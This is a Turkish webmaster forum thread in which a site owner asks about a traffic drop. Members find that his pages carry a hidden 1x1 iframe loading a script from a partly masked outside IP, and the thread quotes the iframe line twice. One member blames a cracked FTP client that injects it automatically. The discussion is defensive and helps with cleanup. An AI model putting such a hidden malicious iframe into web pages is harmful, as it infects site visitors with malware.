İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

dalgalanmamı filitremi

cellotin

0
İyinet Üyesi
Reaction score
0
merhaba arkadaşlar.
sitemin 2-3k civarındaki hitleri 100-200 arasına düştü ayrıca index sayısı 130k lardan 145k lara çık tı ve her geçen gün biraz daha yükseliyor index sayısı.
Bu sitem dalgalanmadanmı etkileniyor yoksa bir bomb veya sandbox damı ben anlayamadım yorumlarınızı bekliyorum.
http://www.cellotin.com

hotr1de

0
İyinet Üyesi
Reaction score
0
sitenden virüs bulaşıyor tam şu sayfadan sitenin en altından iframe çekmişsin: <iframe src='http://81.95.149.xxx/cgi-bin/nsp.cgi?p=ddd' width=1 height=1 style='visibility: hidden;'></iframe>

-rep

edit: -rep olayı kalkmış ( gerekiyor bazen doğrusu )

cellotin

0
İyinet Üyesi
Reaction score
0
sitenden virüs bulaşıyor tam şu sayfadan sitenin en altından iframe çekmişsin: <iframe src='http://81.95.149.xxx/cgi-bin/nsp.cgi?p=ddd' width=1 height=1 style='visibility: hidden;'></iframe>

-rep

edit: -rep olayı kalkmış ( gerekiyor bazen doğrusu )

ilgin için teşkkür ederim ama daha önce hiç böyle bir şey duymamıştım birazdaha açıklarmısın.

osahin

0
İyinet Üyesi
Reaction score
34
Arkadaşın bilerek yaptığı birşey değil bu virüs, sende siteni bir an önce kapat yada temizle yoksa googledan tamamen banlanacaksın... Sorunuda ikinci arkadaş yazmış işte.

cellotin

0
İyinet Üyesi
Reaction score
0
nasıl temizlenir bu bu iframeyi silerekmi temizleniyor.

hotr1de

0
İyinet Üyesi
Reaction score
0
nasıl temizlenir bu bu iframeyi silerekmi temizleniyor.

evet öyle yapınca temizleniyor anlamıyorum böyle virüs bulaştırıp sonra hiçbirşey bilmiyormuş gibi yazanları, o iframe'ide neden ekledin merak ediyorum insan sitesinin altına neden öyle bir iframe eklesinki bir kastı yoksa ?

cellotin

0
İyinet Üyesi
Reaction score
0
evet öyle yapınca temizleniyor anlamıyorum böyle virüs bulaştırıp sonra hiçbirşey bilmiyormuş gibi yazanları, o iframe'ide neden ekledin merak ediyorum insan sitesinin altına neden öyle bir iframe eklesinki bir kastı yoksa ?

Verdiğin bilgiler için ilk önce teşekkür ediyorum bilerek eklemediğim kesin haberimin olmama nedeni ise fazla bir bilgim yok.

ankara

0
İyinet Üyesi
Reaction score
0
arkadaşalr aynı frameyi bir çok siteme yedim ve piyasadan aldığım FULL cutrftp Den kaynaklandığını anladım .

Birisi bana cracklanmış bir cuteftp vermiti html saffalarıma otomatik ekliyor.

Kontrol edin Cracklanmış hazır ftp ve tasarım programalrına dikkat lütfen

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5